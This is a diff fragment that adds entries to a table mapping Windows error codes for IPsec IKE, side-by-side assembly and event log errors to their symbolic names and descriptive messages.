+ 0x00003614: ("ERROR_IPSEC_IKE_LOAD_SOFT_SA", "Soft SA loaded"),
+ 0x00003615: ("ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN", "Soft SA torn down"),
+ 0x00003616: ("ERROR_IPSEC_IKE_INVALID_COOKIE", "Invalid cookie received."),
+ 0x00003617: ("ERROR_IPSEC_IKE_NO_PEER_CERT", "Peer failed to send valid machine certificate"),
+ 0x00003618: ("ERROR_IPSEC_IKE_PEER_CRL_FAILED", "Certification Revocation check of peer's certificate failed"),
+ 0x00003619: ("ERROR_IPSEC_IKE_POLICY_CHANGE", "New policy invalidated SAs formed with old policy"),
+ 0x0000361a: ("ERROR_IPSEC_IKE_NO_MM_POLICY", "There is no available Main Mode IKE policy."),
+ 0x0000361b: ("ERROR_IPSEC_IKE_NOTCBPRIV", "Failed to enabled TCB privilege."),
+ 0x0000361c: ("ERROR_IPSEC_IKE_SECLOADFAIL", "Failed to load SECURITY.DLL."),
+ 0x0000361d: ("ERROR_IPSEC_IKE_FAILSSPINIT", "Failed to obtain security function table dispatch address from SSPI."),
+ 0x0000361e: ("ERROR_IPSEC_IKE_FAILQUERYSSP", "Failed to query Kerberos package to obtain max token size."),
+ 0x0000361f: ("ERROR_IPSEC_IKE_SRVACQFAIL", "Failed to obtain Kerberos server credentials for ISAKMP/ERROR_IPSEC_IKE service. Kerberos authentication will not function. The most likely reason for this is lack of domain membership. This is normal if your computer is a member of a workgroup."),
+ 0x00003620: ("ERROR_IPSEC_IKE_SRVQUERYCRED", "Failed to determine SSPI principal name for ISAKMP/ERROR_IPSEC_IKE service (QueryCredentialsAttributes)."),
+ 0x00003621: ("ERROR_IPSEC_IKE_GETSPIFAIL", "Failed to obtain new SPI for the inbound SA from IPsec driver. The most common cause for this is that the driver does not have the correct filter. Check your policy to verify the filters."),
+ 0x00003622: ("ERROR_IPSEC_IKE_INVALID_FILTER", "Given filter is invalid"),
+ 0x00003623: ("ERROR_IPSEC_IKE_OUT_OF_MEMORY", "Memory allocation failed."),
+ 0x00003624: ("ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED", "Failed to add Security Association to IPsec Driver. The most common cause for this is if the IKE negotiation took too long to complete. If the problem persists, reduce the load on the faulting machine."),
+ 0x00003625: ("ERROR_IPSEC_IKE_INVALID_POLICY", "Invalid policy"),
+ 0x00003626: ("ERROR_IPSEC_IKE_UNKNOWN_DOI", "Invalid DOI"),
+ 0x00003627: ("ERROR_IPSEC_IKE_INVALID_SITUATION", "Invalid situation"),
+ 0x00003628: ("ERROR_IPSEC_IKE_DH_FAILURE", "Diffie-Hellman failure"),
+ 0x00003629: ("ERROR_IPSEC_IKE_INVALID_GROUP", "Invalid Diffie-Hellman group"),
+ 0x0000362a: ("ERROR_IPSEC_IKE_ENCRYPT", "Error encrypting payload"),
+ 0x0000362b: ("ERROR_IPSEC_IKE_DECRYPT", "Error decrypting payload"),
+ 0x0000362c: ("ERROR_IPSEC_IKE_POLICY_MATCH", "Policy match error"),
+ 0x0000362d: ("ERROR_IPSEC_IKE_UNSUPPORTED_ID", "Unsupported ID"),
+ 0x0000362e: ("ERROR_IPSEC_IKE_INVALID_HASH", "Hash verification failed"),
+ 0x0000362f: ("ERROR_IPSEC_IKE_INVALID_HASH_ALG", "Invalid hash algorithm"),
+ 0x00003630: ("ERROR_IPSEC_IKE_INVALID_HASH_SIZE", "Invalid hash size"),
+ 0x00003631: ("ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG", "Invalid encryption algorithm"),
+ 0x00003632: ("ERROR_IPSEC_IKE_INVALID_AUTH_ALG", "Invalid authentication algorithm"),
+ 0x00003633: ("ERROR_IPSEC_IKE_INVALID_SIG", "Invalid certificate signature"),
+ 0x00003634: ("ERROR_IPSEC_IKE_LOAD_FAILED", "Load failed"),
+ 0x00003635: ("ERROR_IPSEC_IKE_RPC_DELETE", "Deleted via RPC call"),
+ 0x00003636: ("ERROR_IPSEC_IKE_BENIGN_REINIT", "Temporary state created to perform reinitialization. This is not a real failure."),
+ 0x00003637: ("ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY", "The lifetime value received in the Responder Lifetime Notify is below the Windows 2000 configured minimum value. Please fix the policy on the peer machine."),
+ 0x00003638: ("ERROR_IPSEC_IKE_INVALID_MAJOR_VERSION", "The recipient cannot handle version of IKE specified in the header."),
+ 0x00003639: ("ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN", "Key length in certificate is too small for configured security requirements."),
+ 0x0000363a: ("ERROR_IPSEC_IKE_MM_LIMIT", "Max number of established MM SAs to peer exceeded."),
+ 0x0000363b: ("ERROR_IPSEC_IKE_NEGOTIATION_DISABLED", "IKE received a policy that disables negotiation."),
+ 0x0000363c: ("ERROR_IPSEC_IKE_QM_LIMIT", "Reached maximum quick mode limit for the main mode. New main mode will be started."),
+ 0x0000363d: ("ERROR_IPSEC_IKE_MM_EXPIRED", "Main mode SA lifetime expired or peer sent a main mode delete."),
+ 0x0000363e: ("ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID", "Main mode SA assumed to be invalid because peer stopped responding."),
+ 0x0000363f: ("ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH", "Certificate doesn't chain to a trusted root in IPsec policy."),
+ 0x00003640: ("ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID", "Received unexpected message ID."),
+ 0x00003641: ("ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD", "Received invalid authentication offers."),
+ 0x00003642: ("ERROR_IPSEC_IKE_DOS_COOKIE_SENT", "Sent DoS cookie notify to initiator."),
+ 0x00003643: ("ERROR_IPSEC_IKE_SHUTTING_DOWN", "IKE service is shutting down."),
+ 0x00003644: ("ERROR_IPSEC_IKE_CGA_AUTH_FAILED", "Could not verify binding between CGA address and certificate."),
+ 0x00003645: ("ERROR_IPSEC_IKE_PROCESS_ERR_NATOA", "Error processing NatOA payload."),
+ 0x00003646: ("ERROR_IPSEC_IKE_INVALID_MM_FOR_QM", "Parameters of the main mode are invalid for this quick mode."),
+ 0x00003647: ("ERROR_IPSEC_IKE_QM_EXPIRED", "Quick mode SA was expired by IPsec driver."),
+ 0x00003648: ("ERROR_IPSEC_IKE_TOO_MANY_FILTERS", "Too many dynamically added IKEEXT filters were detected."),
+ 0x00003649: ("ERROR_IPSEC_IKE_NEG_STATUS_END", " ERROR_IPSEC_IKE_NEG_STATUS_END"),
+ 0x0000364a: ("ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL", "NAP reauth succeeded and must delete the dummy NAP IKEv2 tunnel."),
+ 0x0000364b: ("ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE", "Error in assigning inner IP address to initiator in tunnel mode."),
+ 0x0000364c: ("ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING", "Require configuration payload missing."),
+ 0x0000364d: ("ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING", "A negotiation running as the security principle who issued the connection is in progress"),
+ 0x0000364e: ("ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS", "SA was deleted due to IKEv1/AuthIP co-existence suppress check."),
+ 0x0000364f: ("ERROR_IPSEC_IKE_RATELIMIT_DROP", "Incoming SA request was dropped due to peer IP address rate limiting."),
+ 0x00003650: ("ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE", "Peer does not support MOBIKE."),
+ 0x00003651: ("ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE", "SA establishment is not authorized."),
+ 0x00003652: ("ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE", "SA establishment is not authorized because there is not a sufficiently strong PKINIT-based credential."),
+ 0x00003653: ("ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY", "SA establishment is not authorized. You may need to enter updated or different credentials such as a smartcard."),
+ 0x00003654: ("ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE", "SA establishment is not authorized because there is not a sufficiently strong PKINIT-based credential. This might be related to certificate-to-account mapping failure for the SA."),
+ 0x00003655: ("ERROR_IPSEC_IKE_NEG_STATUS_EXTENDED_END", " ERROR_IPSEC_IKE_NEG_STATUS_EXTENDED_END"),
+ 0x00003656: ("ERROR_IPSEC_BAD_SPI", "The SPI in the packet does not match a valid IPsec SA."),
+ 0x00003657: ("ERROR_IPSEC_SA_LIFETIME_EXPIRED", "Packet was received on an IPsec SA whose lifetime has expired."),
+ 0x00003658: ("ERROR_IPSEC_WRONG_SA", "Packet was received on an IPsec SA that does not match the packet characteristics."),
+ 0x00003659: ("ERROR_IPSEC_REPLAY_CHECK_FAILED", "Packet sequence number replay check failed."),
+ 0x0000365a: ("ERROR_IPSEC_INVALID_PACKET", "IPsec header and/or trailer in the packet is invalid."),
+ 0x0000365b: ("ERROR_IPSEC_INTEGRITY_CHECK_FAILED", "IPsec integrity check failed."),
+ 0x0000365c: ("ERROR_IPSEC_CLEAR_TEXT_DROP", "IPsec dropped a clear text packet."),
+ 0x0000365d: ("ERROR_IPSEC_AUTH_FIREWALL_DROP", "IPsec dropped an incoming ESP packet in authenticated firewall mode. This drop is benign."),
+ 0x0000365e: ("ERROR_IPSEC_THROTTLE_DROP", "IPsec dropped a packet due to DoS throttling."),
+ 0x00003665: ("ERROR_IPSEC_DOSP_BLOCK", "IPsec DoS Protection matched an explicit block rule."),
+ 0x00003666: ("ERROR_IPSEC_DOSP_RECEIVED_MULTICAST", "IPsec DoS Protection received an IPsec specific multicast packet which is not allowed."),
+ 0x00003667: ("ERROR_IPSEC_DOSP_INVALID_PACKET", "IPsec DoS Protection received an incorrectly formatted packet."),
+ 0x00003668: ("ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED", "IPsec DoS Protection failed to look up state."),
+ 0x00003669: ("ERROR_IPSEC_DOSP_MAX_ENTRIES", "IPsec DoS Protection failed to create state because the maximum number of entries allowed by policy has been reached."),
+ 0x0000366a: ("ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED", "IPsec DoS Protection received an IPsec negotiation packet for a keying module which is not allowed by policy."),
+ 0x0000366b: ("ERROR_IPSEC_DOSP_NOT_INSTALLED", "IPsec DoS Protection has not been enabled."),
+ 0x0000366c: ("ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES", "IPsec DoS Protection failed to create a per internal IP rate limit queue because the maximum number of queues allowed by policy has been reached."),
+ 0x000036b0: ("ERROR_SXS_SECTION_NOT_FOUND", "The requested section was not present in the activation context."),
+ 0x000036b1: ("ERROR_SXS_CANT_GEN_ACTCTX", "The application has failed to start because its side-by-side configuration is incorrect. Please see the application event log or use the command-line sxstrace.exe tool for more detail."),
+ 0x000036b2: ("ERROR_SXS_INVALID_ACTCTXDATA_FORMAT", "The application binding data format is invalid."),
+ 0x000036b3: ("ERROR_SXS_ASSEMBLY_NOT_FOUND", "The referenced assembly is not installed on your system."),
+ 0x000036b4: ("ERROR_SXS_MANIFEST_FORMAT_ERROR", "The manifest file does not begin with the required tag and format information."),
+ 0x000036b5: ("ERROR_SXS_MANIFEST_PARSE_ERROR", "The manifest file contains one or more syntax errors."),
+ 0x000036b6: ("ERROR_SXS_ACTIVATION_CONTEXT_DISABLED", "The application attempted to activate a disabled activation context."),
+ 0x000036b7: ("ERROR_SXS_KEY_NOT_FOUND", "The requested lookup key was not found in any active activation context."),
+ 0x000036b8: ("ERROR_SXS_VERSION_CONFLICT", "A component version required by the application conflicts with another component version already active."),
+ 0x000036b9: ("ERROR_SXS_WRONG_SECTION_TYPE", "The type requested activation context section does not match the query API used."),
+ 0x000036ba: ("ERROR_SXS_THREAD_QUERIES_DISABLED", "Lack of system resources has required isolated activation to be disabled for the current thread of execution."),
+ 0x000036bb: ("ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET", "An attempt to set the process default activation context failed because the process default activation context was already set."),
+ 0x000036bc: ("ERROR_SXS_UNKNOWN_ENCODING_GROUP", "The encoding group identifier specified is not recognized."),
+ 0x000036bd: ("ERROR_SXS_UNKNOWN_ENCODING", "The encoding requested is not recognized."),
+ 0x000036be: ("ERROR_SXS_INVALID_XML_NAMESPACE_URI", "The manifest contains a reference to an invalid URI."),
+ 0x000036bf: ("ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED", "The application manifest contains a reference to a dependent assembly which is not installed"),
+ 0x000036c0: ("ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED", "The manifest for an assembly used by the application has a reference to a dependent assembly which is not installed"),
+ 0x000036c1: ("ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE", "The manifest contains an attribute for the assembly identity which is not valid."),
+ 0x000036c2: ("ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE", "The manifest is missing the required default namespace specification on the assembly element."),
+ 0x000036c3: ("ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE", "The manifest has a default namespace specified on the assembly element but its value is not 'urn:schemas-microsoft-com:asm.v1'."),
+ 0x000036c4: ("ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT", "The private manifest probed has crossed a path with an unsupported reparse point."),
+ 0x000036c5: ("ERROR_SXS_DUPLICATE_DLL_NAME", "Two or more components referenced directly or indirectly by the application manifest have files by the same name."),
+ 0x000036c6: ("ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME", "Two or more components referenced directly or indirectly by the application manifest have window classes with the same name."),
+ 0x000036c7: ("ERROR_SXS_DUPLICATE_CLSID", "Two or more components referenced directly or indirectly by the application manifest have the same COM server CLSIDs."),
+ 0x000036c8: ("ERROR_SXS_DUPLICATE_IID", "Two or more components referenced directly or indirectly by the application manifest have proxies for the same COM interface IIDs."),
+ 0x000036c9: ("ERROR_SXS_DUPLICATE_TLBID", "Two or more components referenced directly or indirectly by the application manifest have the same COM type library TLBIDs."),
+ 0x000036ca: ("ERROR_SXS_DUPLICATE_PROGID", "Two or more components referenced directly or indirectly by the application manifest have the same COM ProgIDs."),
+ 0x000036cb: ("ERROR_SXS_DUPLICATE_ASSEMBLY_NAME", "Two or more components referenced directly or indirectly by the application manifest are different versions of the same component which is not permitted."),
+ 0x000036cc: ("ERROR_SXS_FILE_HASH_MISMATCH", "A component's file does not match the verification information present in the component manifest."),
+ 0x000036cd: ("ERROR_SXS_POLICY_PARSE_ERROR", "The policy manifest contains one or more syntax errors."),
+ 0x000036ce: ("ERROR_SXS_XML_E_MISSINGQUOTE", "Manifest Parse Error : A string literal was expected, but no opening quote character was found."),
+ 0x000036cf: ("ERROR_SXS_XML_E_COMMENTSYNTAX", "Manifest Parse Error : Incorrect syntax was used in a comment."),
+ 0x000036d0: ("ERROR_SXS_XML_E_BADSTARTNAMECHAR", "Manifest Parse Error : A name was started with an invalid character."),
+ 0x000036d1: ("ERROR_SXS_XML_E_BADNAMECHAR", "Manifest Parse Error : A name contained an invalid character."),
+ 0x000036d2: ("ERROR_SXS_XML_E_BADCHARINSTRING", "Manifest Parse Error : A string literal contained an invalid character."),
+ 0x000036d3: ("ERROR_SXS_XML_E_XMLDECLSYNTAX", "Manifest Parse Error : Invalid syntax for an xml declaration."),
+ 0x000036d4: ("ERROR_SXS_XML_E_BADCHARDATA", "Manifest Parse Error : An Invalid character was found in text content."),
+ 0x000036d5: ("ERROR_SXS_XML_E_MISSINGWHITESPACE", "Manifest Parse Error : Required white space was missing."),
+ 0x000036d6: ("ERROR_SXS_XML_E_EXPECTINGTAGEND", "Manifest Parse Error : The character '>' was expected."),
+ 0x000036d7: ("ERROR_SXS_XML_E_MISSINGSEMICOLON", "Manifest Parse Error : A semi colon character was expected."),
+ 0x000036d8: ("ERROR_SXS_XML_E_UNBALANCEDPAREN", "Manifest Parse Error : Unbalanced parentheses."),
+ 0x000036d9: ("ERROR_SXS_XML_E_INTERNALERROR", "Manifest Parse Error : Internal error."),
+ 0x000036da: ("ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE", "Manifest Parse Error : Whitespace is not allowed at this location."),
+ 0x000036db: ("ERROR_SXS_XML_E_INCOMPLETE_ENCODING", "Manifest Parse Error : End of file reached in invalid state for current encoding."),
+ 0x000036dc: ("ERROR_SXS_XML_E_MISSING_PAREN", "Manifest Parse Error : Missing parenthesis."),
+ 0x000036dd: ("ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE", "Manifest Parse Error : A single or double closing quote character (\' or \") is missing."),
+ 0x000036de: ("ERROR_SXS_XML_E_MULTIPLE_COLONS", "Manifest Parse Error : Multiple colons are not allowed in a name."),
+ 0x000036df: ("ERROR_SXS_XML_E_INVALID_DECIMAL", "Manifest Parse Error : Invalid character for decimal digit."),
+ 0x000036e0: ("ERROR_SXS_XML_E_INVALID_HEXIDECIMAL", "Manifest Parse Error : Invalid character for hexadecimal digit."),
+ 0x000036e1: ("ERROR_SXS_XML_E_INVALID_UNICODE", "Manifest Parse Error : Invalid unicode character value for this platform."),
+ 0x000036e2: ("ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK", "Manifest Parse Error : Expecting whitespace or '?'."),
+ 0x000036e3: ("ERROR_SXS_XML_E_UNEXPECTEDENDTAG", "Manifest Parse Error : End tag was not expected at this location."),
+ 0x000036e4: ("ERROR_SXS_XML_E_UNCLOSEDTAG", "Manifest Parse Error : The following tags were not closed: %1."),
+ 0x000036e5: ("ERROR_SXS_XML_E_DUPLICATEATTRIBUTE", "Manifest Parse Error : Duplicate attribute."),
+ 0x000036e6: ("ERROR_SXS_XML_E_MULTIPLEROOTS", "Manifest Parse Error : Only one top level element is allowed in an XML document."),
+ 0x000036e7: ("ERROR_SXS_XML_E_INVALIDATROOTLEVEL", "Manifest Parse Error : Invalid at the top level of the document."),
+ 0x000036e8: ("ERROR_SXS_XML_E_BADXMLDECL", "Manifest Parse Error : Invalid xml declaration."),
+ 0x000036e9: ("ERROR_SXS_XML_E_MISSINGROOT", "Manifest Parse Error : XML document must have a top level element."),
+ 0x000036ea: ("ERROR_SXS_XML_E_UNEXPECTEDEOF", "Manifest Parse Error : Unexpected end of file."),
+ 0x000036eb: ("ERROR_SXS_XML_E_BADPEREFINSUBSET", "Manifest Parse Error : Parameter entities cannot be used inside markup declarations in an internal subset."),
+ 0x000036ec: ("ERROR_SXS_XML_E_UNCLOSEDSTARTTAG", "Manifest Parse Error : Element was not closed."),
+ 0x000036ed: ("ERROR_SXS_XML_E_UNCLOSEDENDTAG", "Manifest Parse Error : End element was missing the character '>'."),
+ 0x000036ee: ("ERROR_SXS_XML_E_UNCLOSEDSTRING", "Manifest Parse Error : A string literal was not closed."),
+ 0x000036ef: ("ERROR_SXS_XML_E_UNCLOSEDCOMMENT", "Manifest Parse Error : A comment was not closed."),
+ 0x000036f0: ("ERROR_SXS_XML_E_UNCLOSEDDECL", "Manifest Parse Error : A declaration was not closed."),
+ 0x000036f1: ("ERROR_SXS_XML_E_UNCLOSEDCDATA", "Manifest Parse Error : A CDATA section was not closed."),
+ 0x000036f2: ("ERROR_SXS_XML_E_RESERVEDNAMESPACE", "Manifest Parse Error : The namespace prefix is not allowed to start with the reserved string 'xml'."),
+ 0x000036f3: ("ERROR_SXS_XML_E_INVALIDENCODING", "Manifest Parse Error : System does not support the specified encoding."),
+ 0x000036f4: ("ERROR_SXS_XML_E_INVALIDSWITCH", "Manifest Parse Error : Switch from current encoding to specified encoding not supported."),
+ 0x000036f5: ("ERROR_SXS_XML_E_BADXMLCASE", "Manifest Parse Error : The name 'xml' is reserved and must be lower case."),
+ 0x000036f6: ("ERROR_SXS_XML_E_INVALID_STANDALONE", "Manifest Parse Error : The standalone attribute must have the value 'yes' or 'no'."),
+ 0x000036f7: ("ERROR_SXS_XML_E_UNEXPECTED_STANDALONE", "Manifest Parse Error : The standalone attribute cannot be used in external entities."),
+ 0x000036f8: ("ERROR_SXS_XML_E_INVALID_VERSION", "Manifest Parse Error : Invalid version number."),
+ 0x000036f9: ("ERROR_SXS_XML_E_MISSINGEQUALS", "Manifest Parse Error : Missing equals sign between attribute and attribute value."),
+ 0x000036fa: ("ERROR_SXS_PROTECTION_RECOVERY_FAILED", "Assembly Protection Error : Unable to recover the specified assembly."),
+ 0x000036fb: ("ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT", "Assembly Protection Error : The public key for an assembly was too short to be allowed."),
+ 0x000036fc: ("ERROR_SXS_PROTECTION_CATALOG_NOT_VALID", "Assembly Protection Error : The catalog for an assembly is not valid, or does not match the assembly's manifest."),
+ 0x000036fd: ("ERROR_SXS_UNTRANSLATABLE_HRESULT", "An HRESULT could not be translated to a corresponding Win32 error code."),
+ 0x000036fe: ("ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING", "Assembly Protection Error : The catalog for an assembly is missing."),
+ 0x000036ff: ("ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE", "The supplied assembly identity is missing one or more attributes which must be present in this context."),
+ 0x00003700: ("ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME", "The supplied assembly identity has one or more attribute names that contain characters not permitted in XML names."),
+ 0x00003701: ("ERROR_SXS_ASSEMBLY_MISSING", "The referenced assembly could not be found."),
+ 0x00003702: ("ERROR_SXS_CORRUPT_ACTIVATION_STACK", "The activation context activation stack for the running thread of execution is corrupt."),
+ 0x00003703: ("ERROR_SXS_CORRUPTION", "The application isolation metadata for this process or thread has become corrupt."),
+ 0x00003704: ("ERROR_SXS_EARLY_DEACTIVATION", "The activation context being deactivated is not the most recently activated one."),
+ 0x00003705: ("ERROR_SXS_INVALID_DEACTIVATION", "The activation context being deactivated is not active for the current thread of execution."),
+ 0x00003706: ("ERROR_SXS_MULTIPLE_DEACTIVATION", "The activation context being deactivated has already been deactivated."),
+ 0x00003707: ("ERROR_SXS_PROCESS_TERMINATION_REQUESTED", "A component used by the isolation facility has requested to terminate the process."),
+ 0x00003708: ("ERROR_SXS_RELEASE_ACTIVATION_CONTEXT", "A kernel mode component is releasing a reference on an activation context."),
+ 0x00003709: ("ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY", "The activation context of system default assembly could not be generated."),
+ 0x0000370a: ("ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE", "The value of an attribute in an identity is not within the legal range."),
+ 0x0000370b: ("ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME", "The name of an attribute in an identity is not within the legal range."),
+ 0x0000370c: ("ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE", "An identity contains two definitions for the same attribute."),
+ 0x0000370d: ("ERROR_SXS_IDENTITY_PARSE_ERROR", "The identity string is malformed. This may be due to a trailing comma, more than two unnamed attributes, missing attribute name or missing attribute value."),
+ 0x0000370e: ("ERROR_MALFORMED_SUBSTITUTION_STRING", "A string containing localized substitutable content was malformed. Either a dollar sign ($) was followed by something other than a left parenthesis or another dollar sign or an substitution's right parenthesis was not found."),
+ 0x0000370f: ("ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN", "The public key token does not correspond to the public key specified."),
+ 0x00003710: ("ERROR_UNMAPPED_SUBSTITUTION_STRING", "A substitution string had no mapping."),
+ 0x00003711: ("ERROR_SXS_ASSEMBLY_NOT_LOCKED", "The component must be locked before making the request."),
+ 0x00003712: ("ERROR_SXS_COMPONENT_STORE_CORRUPT", "The component store has been corrupted."),
+ 0x00003713: ("ERROR_ADVANCED_INSTALLER_FAILED", "An advanced installer failed during setup or servicing."),
+ 0x00003714: ("ERROR_XML_ENCODING_MISMATCH", "The character encoding in the XML declaration did not match the encoding used in the document."),
+ 0x00003715: ("ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT", "The identities of the manifests are identical but their contents are different."),
+ 0x00003716: ("ERROR_SXS_IDENTITIES_DIFFERENT", "The component identities are different."),
+ 0x00003717: ("ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT", "The assembly is not a deployment."),
+ 0x00003718: ("ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY", "The file is not a part of the assembly."),
+ 0x00003719: ("ERROR_SXS_MANIFEST_TOO_BIG", "The size of the manifest exceeds the maximum allowed."),
+ 0x0000371a: ("ERROR_SXS_SETTING_NOT_REGISTERED", "The setting is not registered."),
+ 0x0000371b: ("ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE", "One or more required members of the transaction are not present."),
+ 0x0000371c: ("ERROR_SMI_PRIMITIVE_INSTALLER_FAILED", "The SMI primitive installer failed during setup or servicing."),
+ 0x0000371d: ("ERROR_GENERIC_COMMAND_FAILED", "A generic command executable returned a result that indicates failure."),
+ 0x0000371e: ("ERROR_SXS_FILE_HASH_MISSING", "A component is missing file verification information in its manifest."),
+ 0x00003a98: ("ERROR_EVT_INVALID_CHANNEL_PATH", "The specified channel path is invalid."),
+ 0x00003a99: ("ERROR_EVT_INVALID_QUERY", "The specified query is invalid."),
+ 0x00003a9a: ("ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND", "The publisher metadata cannot be found in the resource."),
+ 0x00003a9b: ("ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND", "The template for an event definition cannot be found in the resource (error = %1)."),
+ 0x00003a9c: ("ERROR_EVT_INVALID_PUBLISHER_NAME", "The specified publisher name is invalid."),
+ 0x00003a9d: ("ERROR_EVT_INVALID_EVENT_DATA", "The event data raised by the publisher is not compatible with the event template definition in the publisher's manifest"),
+ 0x00003a9f: ("ERROR_EVT_CHANNEL_NOT_FOUND", "The specified channel could not be found. Check channel configuration."),
+ 0x00003aa0: ("ERROR_EVT_MALFORMED_XML_TEXT", "The specified xml text was not well-formed. See Extended Error for more details."),
+ 0x00003aa1: ("ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL", "The caller is trying to subscribe to a direct channel which is not allowed. The events for a direct channel go directly to a logfile and cannot be subscribed to."),
+ 0x00003aa2: ("ERROR_EVT_CONFIGURATION_ERROR", "Configuration error."),
+ 0x00003aa3: ("ERROR_EVT_QUERY_RESULT_STALE", "The query result is stale / invalid. This may be due to the log being cleared or rolling over after the query result was created. Users should handle this code by releasing the query result object and reissuing the query."),
+ 0x00003aa4: ("ERROR_EVT_QUERY_RESULT_INVALID_POSITION", "Query result is currently at an invalid position."),
+ 0x00003aa5: ("ERROR_EVT_NON_VALIDATING_MSXML", "Registered MSXML doesn't support validation."),
+ 0x00003aa6: ("ERROR_EVT_FILTER_ALREADYSCOPED", "An expression can only be followed by a change of scope operation if it itself evaluates to a node set and is not already part of some other change of scope operation."),
+ 0x00003aa7: ("ERROR_EVT_FILTER_NOTELTSET", "Can't perform a step operation from a term that does not represent an element set."),
+ 0x00003aa8: ("ERROR_EVT_FILTER_INVARG", "Left hand side arguments to binary operators must be either attributes, nodes or variables and right hand side arguments must be constants."),
+ 0x00003aa9: ("ERROR_EVT_FILTER_INVTEST", "A step operation must involve either a node test or, in the case of a predicate, an algebraic expression against which to test each node in the node set identified by the preceding node set can be evaluated."),
+ 0x00003aaa: ("ERROR_EVT_FILTER_INVTYPE", "This data type is currently unsupported."),
+ 0x00003aab: ("ERROR_EVT_FILTER_PARSEERR", "A syntax error occurred at position %1!d!"),
+ 0x00003aac: ("ERROR_EVT_FILTER_UNSUPPORTEDOP", "This operator is unsupported by this implementation of the filter."),
+ 0x00003aad: ("ERROR_EVT_FILTER_UNEXPECTEDTOKEN", "The token encountered was unexpected."),
+ 0x00003aae: ("ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL", "The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation."),
+ 0x00003aaf: ("ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE", "Channel property %1!s! contains invalid value. The value has invalid type, is outside of valid range, can't be updated or is not supported by this type of channel."),
+ 0x00003ab0: ("ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE", "Publisher property %1!s! contains invalid value. The value has invalid type, is outside of valid range, can't be updated or is not supported by this type of publisher."),
+ 0x00003ab1: ("ERROR_EVT_CHANNEL_CANNOT_ACTIVATE", "The channel fails to activate."),
+ 0x00003ab2: ("ERROR_EVT_FILTER_TOO_COMPLEX", "The xpath expression exceeded supported complexity. Please symplify it or split it into two or more simple expressions."),
+ 0x00003ab3: ("ERROR_EVT_MESSAGE_NOT_FOUND", "the message resource is present but the message is not found in the string/message table"),
+ 0x00003ab4: ("ERROR_EVT_MESSAGE_ID_NOT_FOUND", "The message id for the desired message could not be found."),
+ 0x00003ab5: ("ERROR_EVT_UNRESOLVED_VALUE_INSERT", "The substitution string for insert index (%1) could not be found."),
+ 0x00003ab6: ("ERROR_EVT_UNRESOLVED_PARAMETER_INSERT", "The description string for parameter reference (%1) could not be found."),
+ 0x00003ab7: ("ERROR_EVT_MAX_INSERTS_REACHED", "The maximum number of replacements has been reached."),
+ 0x00003ab8: ("ERROR_EVT_EVENT_DEFINITION_NOT_FOUND", "The event definition could not be found for event id (%1)."),
+ 0x00003ab9: ("ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND", "The locale specific resource for the desired message is not present."),
+ 0x00003aba: ("ERROR_EVT_VERSION_TOO_OLD", "The resource is too old to be compatible."),
+ 0x00003abb: ("ERROR_EVT_VERSION_TOO_NEW", "The resource is too new to be compatible."),
+ 0x00003abc: ("ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY", "The channel at index %1!d! of the query can't be opened."),
